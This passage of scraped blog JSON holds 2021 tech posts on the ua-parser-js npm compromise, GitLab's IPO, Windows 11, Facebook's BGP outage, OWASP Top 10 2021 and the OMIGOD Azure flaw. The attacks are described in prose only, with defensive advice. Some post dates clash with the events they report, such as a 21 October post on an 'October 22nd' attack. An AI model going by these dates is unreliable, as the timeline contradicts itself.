Pay attention to the engineering.\n","date":"28 October 2021","externalUrl":null,"permalink":"/posts/211028-facebook-rebrands-to-meta/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Facebook’s rebrand to Meta signals a massive infrastructure bet on the metaverse — here’s what it means for developers and platform engineers.","title":"Facebook Becomes Meta — What the Rebrand Means for Platform Engineering","type":"posts"},{"content":"Another week, another npm supply chain attack — except this one hit different. On October 22nd, the widely-used ua-parser-js package was compromised when an attacker gained access to the maintainer\u0026rsquo;s npm account and published three malicious versions (0.7.29, 0.8.0, and 1.0.0). The package has over 7 million weekly downloads and is used by companies including Facebook, Amazon, Microsoft, Google, and Slack.\nThe malicious versions contained scripts that downloaded and executed cryptominers on Linux systems and both cryptominers and credential-stealing trojans on Windows. If your CI/CD pipeline, development environment, or production system pulled one of these versions between the time of publication and npm\u0026rsquo;s takedown, you may have been compromised.\nI\u0026rsquo;ve been writing about supply chain security for months now, and every new incident makes the same point more forcefully: our dependency on the npm ecosystem is a systemic risk that we are not adequately addressing.\nThe Attack Vector # The attack followed a pattern we\u0026rsquo;ve seen before: account takeover of a legitimate maintainer. The attacker didn\u0026rsquo;t create a typosquatted package or a malicious new library. They hijacked an established, trusted package with millions of users and years of history. 
This is the supply chain equivalent of breaking into a bank vault rather than setting up a fake ATM.\nThe malicious payload was straightforward but effective:\nA preinstall script that executed platform-specific binaries\nOn Linux: a cryptominer binary\nOn Windows: a cryptominer plus a DLL that harvested credentials from browsers and sent them to a remote server\nThe versions were live on npm for approximately four hours before being identified and pulled. Four hours doesn\u0026rsquo;t sound like much, but consider how many CI/CD pipelines run during a workday. How many npm install commands execute across the world in four hours. How many Docker images get built with npm install as a step. The blast radius of even a brief compromise of a popular package is enormous.\nThe compromised versions were 0.7.29, 0.8.0, and 1.0.0. Clean versions (0.7.30, 0.8.1, and 1.0.1) were published shortly after. If you use ua-parser-js, check your lock files immediately.\nWhy This Keeps Happening # The fundamental problem is that npm\u0026rsquo;s security model puts enormous trust in individual maintainer accounts, and those accounts are often protected by nothing more than a password. The ua-parser-js maintainer, Faisal Salman, confirmed that his account was compromised — likely through credential reuse or a phishing attack.\nnpm has offered two-factor authentication for years, but adoption remains low. And even 2FA doesn\u0026rsquo;t prevent all account takeover scenarios — session hijacking, OAuth token theft, and social engineering attacks against npm support can all bypass it.\nBut the account security issue is only the surface problem. The deeper issues are architectural:\nImplicit trust in updates: When you specify \u0026quot;ua-parser-js\u0026quot;: \u0026quot;^0.7.28\u0026quot; in your package.json, you\u0026rsquo;re saying \u0026ldquo;I trust any future 0.7.x release.\u0026rdquo; Your lock file protects you on npm ci, but npm install will happily pull a new matching version. 
And many teams use npm install in their Dockerfiles and CI pipelines.\nNo code review for published packages: Anyone with publish access can push arbitrary code to npm. There\u0026rsquo;s no review process, no signature verification by default, no diff between versions shown to consumers. You get what you get.\nMassive dependency trees: A typical Node.js application has hundreds or thousands of transitive dependencies. You may never have heard of ua-parser-js, but there\u0026rsquo;s a good chance something in your dependency tree uses it. The npm ls ua-parser-js command might surprise you.\nPractical Defenses # After the initial panic, the practical question is: what can we actually do about this? Here\u0026rsquo;s what I\u0026rsquo;m recommending to teams right now:\nLock files are non-negotiable. Always use npm ci in CI/CD pipelines, never npm install. The lock file pins exact versions and integrity hashes. If someone publishes a compromised version, your builds won\u0026rsquo;t pull it as long as your lock file hasn\u0026rsquo;t been updated.\nAudit dependencies regularly. Run npm audit as a CI step. It\u0026rsquo;s not perfect — it only catches known vulnerabilities, not active compromises — but it\u0026rsquo;s a baseline. Consider tools like Socket or Snyk that do deeper behavioral analysis of packages.\nReview dependency updates before merging. When Dependabot or Renovate creates a PR to update a package, actually look at what changed. For direct dependencies, check the changelog and the diff. For a package like ua-parser-js, a new preinstall script downloading binaries should be an obvious red flag.\nConsider using a private registry or proxy. Tools like Verdaccio, Artifactory, or npm Enterprise let you control which packages and versions are available to your team. You can implement an allowlist, delay propagation of new versions, or require manual approval for updates to critical packages.\nMinimize your dependency surface. Do you really need that package? 
For something like user-agent parsing, consider whether a simple regex or a smaller, more focused package might suffice. Every dependency is an attack surface.\nThe Broader Pattern # This is the third major npm supply chain incident in recent months, following the coa and rc compromises that happened around the same time. The pattern is clear: attackers have realized that compromising a single popular npm package gives them access to thousands of downstream projects simultaneously.\nThe npm registry serves billions of downloads per week. It\u0026rsquo;s critical infrastructure for the global software supply chain. And it\u0026rsquo;s secured, fundamentally, by individual maintainers choosing good passwords and enabling 2FA.\nWe need systemic solutions. npm\u0026rsquo;s recent acquisition by GitHub (and by extension, Microsoft) gives them the resources to implement stronger controls — mandatory 2FA for popular packages, automated behavioral analysis of new versions, signing and provenance attestation. Some of these are in progress. They need to ship faster.\nMy Take # Every time I write about a supply chain attack, I feel like I\u0026rsquo;m repeating myself. And I am, because the underlying dynamics haven\u0026rsquo;t changed. We\u0026rsquo;re building our software on foundations we don\u0026rsquo;t control, maintained by people we don\u0026rsquo;t know, secured by mechanisms we don\u0026rsquo;t verify.\nI don\u0026rsquo;t say this to blame maintainers — Faisal Salman maintains ua-parser-js as a side project, and he responded quickly and transparently once the compromise was identified. The problem is structural. We\u0026rsquo;ve built an ecosystem where individual volunteers are single points of failure for critical infrastructure used by the world\u0026rsquo;s largest companies.\nUntil the ecosystem builds better guardrails — and until developers take dependency management seriously as a security concern — these incidents will keep happening. 
Lock your dependencies. Audit your supply chain. And maybe think twice before adding that next npm install.\nPart of the Security in Practice series. Previous entries have covered the Confluence RCE, OMIGOD vulnerability, and the OWASP Top 10 2021 update. Supply chain security remains the defining challenge of modern software development.\n","date":"21 October 2021","externalUrl":null,"permalink":"/posts/211021-ua-parser-js-npm-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The popular ua-parser-js npm package was hijacked to deliver cryptominers and credential stealers, affecting millions of weekly downloads.","title":"ua-parser-js Compromised — Supply Chain Attacks Hit npm Again","type":"posts"},{"content":"GitLab went public on the NASDAQ this Thursday, opening at $94.25 per share — well above its IPO price of $77 — and quickly climbing to give the company a valuation north of $11 billion. For a company built around an open-source code repository that started as a side project by Ukrainian developer Dmitriy Zaporozhets in 2011, it\u0026rsquo;s a remarkable milestone.\nBut beyond the financial headlines, GitLab\u0026rsquo;s IPO is significant for what it says about the viability of open-source business models, the competitive dynamics of the DevOps platform market, and where developer tooling is headed.\nThe Open-Core Model, Validated # GitLab has been one of the most visible practitioners of the \u0026ldquo;open-core\u0026rdquo; business model: a substantial open-source community edition (CE) that anyone can self-host for free, paired with proprietary enterprise features that generate revenue. Their pricing tiers are transparent, and they\u0026rsquo;ve been remarkably open about their internal operations — their handbook is public, their strategy documents are public, even their OKRs are public.\nThis model has always had its critics. 
Open-source purists argue that withholding features creates a two-tier community. Investors have historically been skeptical about building a business on software anyone can fork. And competitors have tried to undercut open-core companies by offering their proprietary features as open-source alternatives.\nGitLab\u0026rsquo;s IPO doesn\u0026rsquo;t settle those debates, but it does demonstrate that open-core can produce a company with real revenue ($233 million ARR at last report), real growth, and enough market confidence to go public. That matters for the entire open-source ecosystem, because it provides a clear proof point for founders and investors considering this model.\nContrast this with the struggles other open-source companies have faced. MongoDB had to create the Server Side Public License (SSPL) to prevent cloud providers from offering their software as a service. Elastic relicensed away from Apache 2.0 for similar reasons. Redis Labs added the Commons Clause. Each of these moves generated significant community backlash. GitLab, by contrast, has maintained a relatively stable relationship with its community edition while growing its enterprise business. That\u0026rsquo;s not easy to pull off.\nThe Single Platform Bet # What sets GitLab apart strategically is their commitment to being a single application for the entire DevOps lifecycle. Source control, CI/CD, package registry, security scanning, monitoring, issue tracking — it\u0026rsquo;s all in one product. This is a fundamentally different approach from GitHub, which has been assembling capabilities through acquisitions and integrations (Actions for CI/CD, npm for packages, Dependabot for security, Codespaces for development environments).\nI\u0026rsquo;ve used both platforms extensively, and the trade-offs are real. GitLab\u0026rsquo;s integrated approach means everything works together without configuration — your merge request shows CI results, security scan findings, and deployment status in one view. 
But it also means you\u0026rsquo;re locked into GitLab\u0026rsquo;s implementation of each capability. If their CI runner performance doesn\u0026rsquo;t meet your needs, or their security scanning misses things that a specialized tool catches, you\u0026rsquo;re stuck with workarounds.\nGitHub\u0026rsquo;s approach gives you best-of-breed flexibility through its marketplace and integrations, but you pay for it in configuration complexity and the occasional integration that breaks after an update.\nFor smaller teams, I increasingly recommend GitLab because the operational overhead of managing multiple tool integrations outweighs the benefits of best-of-breed selection. For larger organizations with dedicated platform teams, GitHub plus specialized tools often makes more sense. But this is a genuinely close call, and the gap is narrowing.\nWhat This Means for Self-Hosted Infrastructure # One aspect that doesn\u0026rsquo;t get enough attention: GitLab\u0026rsquo;s self-hosted offering remains genuinely viable, and for many organizations, it\u0026rsquo;s the right choice. Financial institutions, government agencies, healthcare organizations, and companies with strict data sovereignty requirements can run the full GitLab stack on their own infrastructure.\nI\u0026rsquo;ve deployed GitLab on-premises for clients in regulated industries, and while it\u0026rsquo;s not trivial — the Omnibus package is large, upgrades require planning, and high-availability configurations demand real infrastructure expertise — it works. This is increasingly rare in a world where most developer tools have gone SaaS-only.\nThe IPO pressure could change this calculus. Public markets want growing SaaS revenue with high margins. Self-hosted licenses are lumpy, harder to upsell, and carry support costs. 
I hope GitLab continues to invest in their self-hosted offering, but I\u0026rsquo;ll be watching their resource allocation carefully over the coming quarters.\nThe Competitive Landscape # GitLab\u0026rsquo;s IPO happens against a backdrop of intense competition in the DevOps platform space. GitHub, backed by Microsoft\u0026rsquo;s resources, continues to ship features at a remarkable pace. Atlassian\u0026rsquo;s Bitbucket still has significant enterprise penetration, though it feels like it\u0026rsquo;s losing momentum. AWS CodeCommit exists but is rarely anyone\u0026rsquo;s first choice.\nThe more interesting competition might come from the edges. Smaller tools like Gitea and Forgejo are picking up steam in the self-hosted space. Specialized CI/CD platforms like CircleCI and Buildkite continue to push the performance envelope. And the entire \u0026ldquo;platform engineering\u0026rdquo; movement — where companies build internal developer platforms using tools like Backstage — represents a different approach to the same problem GitLab is solving.\nMy Take # I have a soft spot for GitLab\u0026rsquo;s story. A company that started as an open-source project, maintained its commitment to transparency and community, and grew into a public company without abandoning its core values — that\u0026rsquo;s rare. It\u0026rsquo;s not perfect; the open-core tension is real, and some of the feature gating decisions feel arbitrary. But compared to the licensing gymnastics we\u0026rsquo;ve seen from other open-source companies, GitLab\u0026rsquo;s approach has been remarkably consistent.\nWhat I\u0026rsquo;m most curious about is how being public affects their development velocity and decision-making. 
Quarterly earnings pressure has a way of shifting priorities from \u0026ldquo;what\u0026rsquo;s right for the product\u0026rdquo; to \u0026ldquo;what moves the revenue number.\u0026rdquo; GitLab\u0026rsquo;s radical transparency — including their public product roadmap — means we\u0026rsquo;ll be able to watch this play out in real time.\nFor now, this is a good day for open-source business models. Not because financial success is the ultimate measure of an open-source project — it isn\u0026rsquo;t — but because it demonstrates that you can build sustainable businesses that fund open-source development at scale. And we need more of those.\nPart of the Developer Landscape series, exploring the tools, platforms, and business models shaping software development. GitLab\u0026rsquo;s journey from side project to public company is one of the more compelling stories in recent developer tooling history.\n","date":"14 October 2021","externalUrl":null,"permalink":"/posts/211014-gitlab-ipo-open-source-business/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitLab’s successful IPO this week validates the open-core model and raises important questions about the future of open-source developer tooling.","title":"GitLab Goes Public — What an IPO Means for Open Source Business Models","type":"posts"},{"content":"Windows 11 officially launched on October 5th, and the tech press has been predictably focused on the centered taskbar, rounded corners, and the somewhat controversial TPM 2.0 requirement. 
But as a developer who has spent the last few years watching Microsoft\u0026rsquo;s remarkable transformation from open-source adversary to genuine contributor, I\u0026rsquo;m far more interested in what\u0026rsquo;s happening under the hood.\nThe real story of Windows 11 for developers isn\u0026rsquo;t the visual refresh — it\u0026rsquo;s the continued maturation of Windows as a first-class development platform for workloads that historically lived exclusively on Linux.\nWSL: From Novelty to Necessity # The Windows Subsystem for Linux has been the single most impactful developer feature Microsoft has shipped in the last decade, and Windows 11 takes it further. WSLg (WSL with GUI support) is now integrated out of the box, meaning you can run Linux GUI applications alongside Windows ones without any additional configuration. This was technically available as a preview in Windows 10, but having it ship as a default feature signals where Microsoft sees the future.\nFor my daily workflow, this means I can run Linux-native development tools with GUI components — think database management tools, profiling visualizers, even full IDEs — without the overhead of a traditional VM or the friction of X server configuration. The integration uses Wayland under the hood, which means GPU acceleration works properly for OpenGL applications.\nBut the more substantive change is the improved architecture of WSL 2 in Windows 11. The Linux kernel ships as a Windows Update component now, which means it gets patched automatically through the normal update cycle. No more manually running wsl --update. For organizations that need to manage developer workstations at scale, this is a significant operational improvement.\nI\u0026rsquo;ve been running WSL 2 as my primary development environment for over a year, and the rough edges — network bridge configuration, file system performance across the Windows/Linux boundary, occasional DNS resolution quirks — have been steadily smoothed out. 
It\u0026rsquo;s not perfect, but it\u0026rsquo;s genuinely good enough for most development workflows.\nThe New Microsoft Store and What It Means for Tooling # Microsoft has completely rebuilt the Store with a new architecture that supports traditional Win32 apps, not just UWP/MSIX packages. More importantly for developers, they\u0026rsquo;ve relaxed the commerce model: developers can use their own payment systems and keep 100% of the revenue for non-game apps.\nWhy does this matter for development tools? Because it lowers the barrier for tool vendors to distribute through a managed channel. Package managers like winget have been filling this gap, but having traditional desktop applications available through the Store — with automatic updates, enterprise deployment support, and a consistent installation experience — addresses a real pain point in Windows development environment setup.\nThe Store will also be the distribution mechanism for Android apps on Windows, running through the Intel Bridge technology and Amazon\u0026rsquo;s Appstore. While this is primarily a consumer feature, it has implications for mobile developers who want to test Android applications without a separate emulator or physical device. We\u0026rsquo;ll have to see how the performance and compatibility story plays out once it\u0026rsquo;s actually available.\nDev Drive and Developer-Focused Features # Microsoft has been signaling that Windows 11 will introduce a \u0026ldquo;Dev Drive\u0026rdquo; feature — a ReFS-based volume optimized for development workloads. 
While this hasn\u0026rsquo;t shipped at launch, the direction is clear: Microsoft recognizes that developer workflows (millions of small files, constant reads and writes during builds, heavy file watching) need different storage optimization than typical user workflows.\nFor anyone who\u0026rsquo;s waited for node_modules to install on an NTFS volume, or watched a large git status crawl through a monorepo, this can\u0026rsquo;t come soon enough. The file system performance gap between Windows and Linux/macOS for development workloads has been a persistent complaint, and it\u0026rsquo;s encouraging to see Microsoft address it at the file system level rather than just saying \u0026ldquo;use WSL.\u0026rdquo;\nThe TPM 2.0 Requirement: Security or Fragmentation? # The elephant in the room is the hardware requirement. Windows 11 requires TPM 2.0, Secure Boot capability, and relatively recent processors. This locks out a significant number of machines that are perfectly capable of running the OS otherwise.\nFrom a security perspective, I understand the reasoning. TPM enables hardware-backed attestation, BitLocker without performance penalties, and a chain of trust from boot through application execution. As we move toward zero-trust security models, having a hardware root of trust isn\u0026rsquo;t a luxury — it\u0026rsquo;s a foundation.\nBut the pragmatic reality is that this creates fragmentation. Enterprise environments with thousands of desktops can\u0026rsquo;t just replace hardware overnight. Development teams may end up supporting both Windows 10 and Windows 11 environments for years. And the CI/CD implications are real — if your build agents are running on older hardware, they\u0026rsquo;re stuck on Windows 10 until 2025 at the earliest.\nFor organizations planning upgrades, my recommendation is to audit your hardware inventory sooner rather than later. The TPM requirement isn\u0026rsquo;t going away, and Windows 10 support has a defined end date. 
Better to plan the migration on your timeline than Microsoft\u0026rsquo;s.\nMy Take # Windows 11 feels like a consolidation release rather than a revolution. The WSL improvements, Store modernization, and focus on developer experience are all evolutionary steps in a direction Microsoft has been heading since Satya Nadella declared \u0026ldquo;Microsoft loves Linux\u0026rdquo; back in 2014. As someone who was deeply skeptical of that statement at the time, I have to admit: they\u0026rsquo;ve largely delivered.\nThe real question for developers is whether to upgrade now or wait. My advice: if you\u0026rsquo;re primarily using WSL for development, the improvements in Windows 11 are worth the upgrade. The GUI support, automatic kernel updates, and general polish improvements make a tangible difference in daily workflow. If you\u0026rsquo;re not using WSL, there\u0026rsquo;s less urgency — wait for the first feature update to shake out the inevitable early bugs.\nWhat I find most interesting is the strategic trajectory. Microsoft is positioning Windows as a meta-platform — a host environment that can run Windows applications, Linux applications, Android applications, and web applications, all with reasonable integration. Whether that vision fully materializes remains to be seen, but the building blocks are falling into place.\nPart of an ongoing series exploring the developer tools and platforms shaping how we build software. The evolution of Windows as a development platform has been one of the most surprising storylines of the past five years.\n","date":"7 October 2021","externalUrl":null,"permalink":"/posts/211007-windows-11-developer-perspective/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Windows 11 launched this week with WSL improvements, a new Microsoft Store, and Android app support coming soon. 
Here’s what matters for developers.","title":"Windows 11 Arrives — What Developers Actually Need to Know","type":"posts"},{"content":"If you tried to reach Facebook, Instagram, or WhatsApp earlier this week, you already know what happened. On October 4th, all three services — along with Facebook\u0026rsquo;s internal tools, badge systems, and even their ability to diagnose the problem — went completely offline for roughly six hours. The root cause? A BGP configuration change that effectively told the rest of the internet that Facebook\u0026rsquo;s network no longer existed.\nThis wasn\u0026rsquo;t a hack. It wasn\u0026rsquo;t a DDoS attack. It was a routine maintenance operation that went catastrophically wrong, and the cascading failures that followed are a masterclass in why infrastructure resilience is about so much more than redundant servers.\nWhat Actually Happened # The technical details, as they\u0026rsquo;ve emerged from Facebook\u0026rsquo;s engineering blog and from independent analysis by Cloudflare, paint a clear picture.\nFacebook\u0026rsquo;s backbone network — the internal infrastructure connecting their data centers — underwent a configuration change that inadvertently withdrew all the BGP route advertisements for Facebook\u0026rsquo;s IP address space. In BGP terms, Facebook\u0026rsquo;s autonomous system (AS32934) simply stopped announcing its routes. Within minutes, every DNS resolver on the planet noticed that Facebook\u0026rsquo;s authoritative nameservers were unreachable, and cached DNS records started expiring.\nThe result: Facebook didn\u0026rsquo;t just go down. It was erased from the internet\u0026rsquo;s routing tables. For the global routing infrastructure, Facebook\u0026rsquo;s IP addresses might as well have not existed.\nWhat makes this particularly interesting from an engineering perspective is the cascade effect. 
Facebook\u0026rsquo;s internal tools — the dashboards, the configuration management systems, the out-of-band access mechanisms — all relied on the same DNS and network infrastructure. When the network went down, engineers couldn\u0026rsquo;t use their normal tools to diagnose and fix the problem. Reports suggest that teams had to physically travel to data centers and access routers via console connections to begin the recovery.\nBGP: The Protocol Nobody Thinks About # For those unfamiliar, BGP (Border Gateway Protocol) is essentially the routing protocol that holds the internet together. It\u0026rsquo;s how networks tell each other \u0026ldquo;I can reach these IP addresses.\u0026rdquo; Every ISP, cloud provider, and major service runs BGP to advertise their routes to the rest of the internet.\nBGP was designed in the late 1980s, and its trust model reflects that era. When a network announces a route, other networks generally believe it. There\u0026rsquo;s no built-in authentication or verification. This is why BGP hijacking — where someone announces routes they don\u0026rsquo;t own — remains a persistent threat. And it\u0026rsquo;s why a misconfiguration can have such dramatic consequences.\nThe internet engineering community has been working on solutions like RPKI (Resource Public Key Infrastructure) to add cryptographic verification to route announcements, but adoption is still patchy. Facebook themselves had valid RPKI records, but that doesn\u0026rsquo;t protect against withdrawing your own routes.\nThe Deeper Lesson: Blast Radius and Control Plane Independence # The most important takeaway isn\u0026rsquo;t that BGP misconfigurations happen — they do, regularly, at ISPs and cloud providers worldwide. It\u0026rsquo;s that Facebook\u0026rsquo;s recovery mechanisms were inside the blast radius of the failure.\nThis is a pattern I\u0026rsquo;ve seen repeatedly in my career, and it\u0026rsquo;s one of the hardest problems in infrastructure engineering. 
Your monitoring, your configuration management, your deployment tools, your communication systems — they all depend on the very infrastructure they\u0026rsquo;re supposed to manage. When that infrastructure fails, you\u0026rsquo;re flying blind.\nThe principle is straightforward: your control plane must be independent of your data plane. In practice, this means:\nOut-of-band management that doesn\u0026rsquo;t depend on your primary network. Console servers with cellular failover. Separate management networks with independent routing. External monitoring that can detect and alert on failures even when your internal systems are down. If your PagerDuty alerts route through the same network as your production traffic, you have a problem. Runbooks for total failure scenarios. Not \u0026ldquo;one server is down\u0026rdquo; runbooks — \u0026ldquo;everything is down and we can\u0026rsquo;t access anything remotely\u0026rdquo; runbooks. Including physical access procedures. DNS diversity. If you run your own authoritative DNS, ensure it\u0026rsquo;s not entirely dependent on a single network path. The WhatsApp Effect # Something that\u0026rsquo;s gotten less technical attention but matters enormously: WhatsApp went down too. In many parts of the world — Latin America, India, much of Africa and Southeast Asia — WhatsApp isn\u0026rsquo;t just a messaging app. It\u0026rsquo;s critical communications infrastructure. Small businesses run on it. Healthcare communications depend on it. Government services use it.\nA six-hour outage of WhatsApp has real-world consequences that go far beyond \u0026ldquo;I can\u0026rsquo;t post my lunch photos.\u0026rdquo; This raises uncomfortable questions about the concentration of critical communications on a single company\u0026rsquo;s infrastructure. 
When three billion people depend on one company\u0026rsquo;s network configuration not having typos, we have a resilience problem that technology alone can\u0026rsquo;t solve.\nMy Take # I\u0026rsquo;ve been doing infrastructure work for decades, and every major outage teaches the same lesson in a slightly different way: complexity is the enemy of reliability. Facebook\u0026rsquo;s network is among the most sophisticated on the planet, managed by some of the best network engineers in the industry. And yet, a single configuration change brought it all down.\nThe fix isn\u0026rsquo;t more complexity. It\u0026rsquo;s not more automation (the automation was part of the problem — the configuration change passed automated checks). It\u0026rsquo;s about designing systems where failures are contained, where recovery paths don\u0026rsquo;t depend on the thing that\u0026rsquo;s broken, and where human judgment remains in the loop for changes that could affect global reachability.\nFor those of us running smaller-scale infrastructure, the lessons are directly applicable. Audit your blast radius. Make sure your monitoring works when your primary systems don\u0026rsquo;t. Test your recovery procedures under realistic failure conditions — not just \u0026ldquo;one node down\u0026rdquo; but \u0026ldquo;everything is down and you can only access the console.\u0026rdquo;\nAnd maybe, just maybe, keep a telephone number for your key team members written down somewhere that isn\u0026rsquo;t in a cloud-hosted contact list.\nPart of an ongoing series on infrastructure design and operational resilience. 
Previous entries have covered CDN outages, cloud vulnerabilities, and the challenge of building reliable distributed systems.\n","date":"30 September 2021","externalUrl":null,"permalink":"/posts/210930-facebook-bgp-outage-internet-fragility/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Facebook, WhatsApp, and Instagram went down for six hours due to a BGP misconfiguration, exposing how fragile the internet’s routing infrastructure really is.","title":"The Facebook Outage — When BGP Goes Wrong, Everything Goes Dark","type":"posts"},{"content":"The OWASP Foundation has just published the 2021 edition of the Top 10, and if you\u0026rsquo;ve been paying attention to the security incidents of the past few years, the reshuffling won\u0026rsquo;t surprise you. But if you\u0026rsquo;ve been coasting on the 2017 list as your security checklist — and let\u0026rsquo;s be honest, many teams have — it\u0026rsquo;s time for a serious reassessment.\nI\u0026rsquo;ve been building web applications since before SQL injection had a catchy name, and every time OWASP updates this list, it forces a useful conversation about where we\u0026rsquo;re actually failing as an industry.\nThe Big Movers # The most notable change is that Broken Access Control has jumped from fifth place all the way to number one. This shouldn\u0026rsquo;t shock anyone who\u0026rsquo;s done a penetration test in the last two years. We\u0026rsquo;ve gotten reasonably good at parameterized queries and output encoding, but authorization logic? That\u0026rsquo;s still a mess in most codebases I review.\nThe problem is structural. Authentication is a solved problem — you pick an identity provider, implement OAuth 2.0 or OIDC, and you\u0026rsquo;re done. But authorization is deeply tied to business logic. There\u0026rsquo;s no generic middleware that can tell you whether user A should be able to edit resource B in context C. 
Every application reinvents this wheel, and most do it poorly.\nCryptographic Failures (formerly \u0026ldquo;Sensitive Data Exposure\u0026rdquo;) moved up to second place. The rename is telling — OWASP is shifting from describing symptoms to describing root causes. It\u0026rsquo;s not just about data being exposed; it\u0026rsquo;s about the cryptographic decisions (or non-decisions) that led there. I still encounter applications using MD5 for password hashing or storing API keys in plaintext config files. In 2021.\nInjection dropping to third might seem surprising given its decade-long reign at number one, but it reflects genuine progress. ORMs, parameterized queries, and frameworks that escape output by default have made classic injection harder to introduce accidentally. We haven\u0026rsquo;t eliminated it — we\u0026rsquo;ve just raised the floor.\nThree New Categories Worth Your Attention # The 2021 list introduces three entirely new categories, and each one tells a story about how software development has changed.\nInsecure Design (A04) is perhaps the most important addition. This isn\u0026rsquo;t about implementation bugs — it\u0026rsquo;s about architectural flaws that no amount of perfect coding can fix. Think of an e-commerce site that lets you enumerate valid discount codes by checking the response time, or an API that returns different error messages for \u0026ldquo;user not found\u0026rdquo; vs \u0026ldquo;wrong password.\u0026rdquo; These are design-level decisions that create vulnerabilities before a single line of code is written.\nI\u0026rsquo;ve been advocating for threat modeling in the design phase for years, and it\u0026rsquo;s gratifying to see OWASP formally recognize that security isn\u0026rsquo;t just a code review activity. If your team doesn\u0026rsquo;t do threat modeling during architecture reviews, this should be your wake-up call.\nSoftware and Data Integrity Failures (A08) covers the increasingly critical area of supply chain security. 
After SolarWinds, Codecov, and the steady drumbeat of npm package compromises, this category feels overdue. It encompasses everything from unsigned updates to CI/CD pipeline integrity to deserializing untrusted data. The common thread: are you verifying the integrity of the software and data flowing through your systems?\nServer-Side Request Forgery (A10) rounds out the new entries. SSRF has been a darling of bug bounty programs for years, particularly as cloud metadata endpoints (like AWS\u0026rsquo;s 169.254.169.254) became lucrative targets. With everything moving to microservices architectures where services routinely make HTTP requests to internal endpoints, SSRF is a natural fit for the list.\nWhat This Means for Your Development Process # If you\u0026rsquo;re treating OWASP Top 10 as a checklist — which, to be clear, OWASP explicitly says you shouldn\u0026rsquo;t — then at minimum you need to update your security training and code review guidelines. But I\u0026rsquo;d encourage teams to go further.\nThe shift toward design-level and supply chain concerns means security needs to move earlier in your development lifecycle. Here\u0026rsquo;s what I\u0026rsquo;d prioritize:\nThreat modeling workshops during design sprints. You don\u0026rsquo;t need a formal methodology — even a 30-minute \u0026ldquo;what could go wrong\u0026rdquo; session with your team will catch design-level issues.\nDependency auditing as a first-class CI/CD concern. Run npm audit, pip-audit, or your language\u0026rsquo;s equivalent on every build. Pin your dependencies. Verify checksums.\nAuthorization testing as part of your integration test suite. For every API endpoint, test that users can only access what they should. Automate it — manual testing doesn\u0026rsquo;t scale.\nSSRF protections at the infrastructure level. Restrict outbound requests from your application servers. Use allowlists for internal service communication. 
Block access to cloud metadata endpoints unless explicitly needed.\nMy Take # What I appreciate most about the 2021 update is its maturity. The list has evolved from \u0026ldquo;here are the bugs you\u0026rsquo;re writing\u0026rdquo; to \u0026ldquo;here are the systemic failures in how you build software.\u0026rdquo; Broken access control, insecure design, and integrity failures aren\u0026rsquo;t problems you solve with a WAF rule or a static analysis tool. They require engineering discipline, architectural thinking, and organizational commitment.\nThe cynical view is that we keep publishing lists like this because nothing actually improves. But I\u0026rsquo;ve watched injection drop from perennial champion to third place over a decade. Progress is possible — it\u0026rsquo;s just slow and requires the right tooling and education.\nIf you haven\u0026rsquo;t already, carve out an afternoon with your team to review the new list against your current applications. You might be surprised what you find — or more accurately, what\u0026rsquo;s been hiding in plain sight.\nThis is part of an ongoing series examining security practices in real-world development. The OWASP Top 10 remains one of the most influential documents in application security, and this update deserves your attention.\n","date":"23 September 2021","externalUrl":null,"permalink":"/posts/210923-owasp-top-10-2021-update/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The OWASP Top 10 gets its first update since 2017, and the changes reflect how fundamentally our attack surface has evolved.","title":"OWASP Top 10 2021 — The Security Landscape Has Shifted","type":"posts"},{"content":"This week\u0026rsquo;s Patch Tuesday brought something genuinely alarming from the Azure world. 
Researchers at Wiz disclosed OMIGOD — a set of four critical vulnerabilities in the Open Management Infrastructure (OMI) agent, a piece of software that Microsoft silently installs on Linux VMs in Azure when you enable certain services. The worst of these, CVE-2021-38647, allows unauthenticated remote code execution as root. Yes, root. With a CVSS score of 9.8.\nAnd here\u0026rsquo;s the part that makes my blood pressure spike: most Azure customers running Linux VMs had no idea this software was installed on their machines.\nWhat Is OMI, and Why Is It on My VM? # OMI (Open Management Infrastructure) is an open-source project maintained by Microsoft. It\u0026rsquo;s a CIM (Common Information Model) management agent — essentially, a lightweight daemon that enables remote management and monitoring of Linux systems. Think of it as the Linux equivalent of WMI (Windows Management Instrumentation).\nWhen you enable certain Azure services on a Linux VM — including Azure Automation, Azure Log Analytics, Azure Configuration Management, Azure Diagnostics, and others — Azure automatically deploys the OMI agent onto your VM. It runs as root, listens on port 5986 (HTTPS) or 5985 (HTTP), and accepts management commands via the WSMAN protocol.\nThe critical vulnerability is breathtakingly simple. When OMI receives a management request, it checks for an authentication header. If the authentication header is entirely absent — not invalid, but simply missing — the request is processed as root. Remove the auth header, get root access. It\u0026rsquo;s the kind of vulnerability that makes you wonder how it survived any security review at all.\nThe Scope of the Problem # According to Wiz\u0026rsquo;s research, OMI is deployed on more than 65% of Azure Linux VMs. That\u0026rsquo;s potentially millions of machines. 
And because the agent listens on network ports, any Linux VM with OMI installed and the management ports exposed — either to the internet or to other VMs in the virtual network — is vulnerable.\nThe attack surface breaks down into two scenarios:\nInternet-facing: If ports 5985/5986 are open to the internet (which they shouldn\u0026rsquo;t be, but misconfigurations happen), an attacker can gain root access from anywhere on the internet. Shodan queries are already showing thousands of exposed instances.\nInternal network: Even if the management ports aren\u0026rsquo;t internet-facing, any attacker with access to your Azure virtual network can pivot through OMI to gain root on adjacent VMs. This makes OMIGOD an excellent privilege escalation and lateral movement tool for attackers who already have a foothold.\nThe Trust Problem # What troubles me most about OMIGOD isn\u0026rsquo;t the vulnerability itself — software has bugs, and even embarrassing authentication bypasses happen. What troubles me is the trust model.\nWhen I deploy a Linux VM in Azure, I expect to control what\u0026rsquo;s running on it. I choose the OS image, I install my packages, I configure my services. That\u0026rsquo;s the fundamental promise of IaaS: you get a virtual machine, and you control the software stack.\nBut Azure silently installs management agents without explicit consent. The OMI deployment happens as a side effect of enabling other services. There\u0026rsquo;s no dialog box saying \u0026ldquo;This will install a root-level management daemon on your VM that listens on network ports.\u0026rdquo; You enable Log Analytics, and OMI appears.\nThis pattern isn\u0026rsquo;t unique to Azure. AWS has the SSM Agent. GCP has the guest agent. All cloud providers install management software on VMs. 
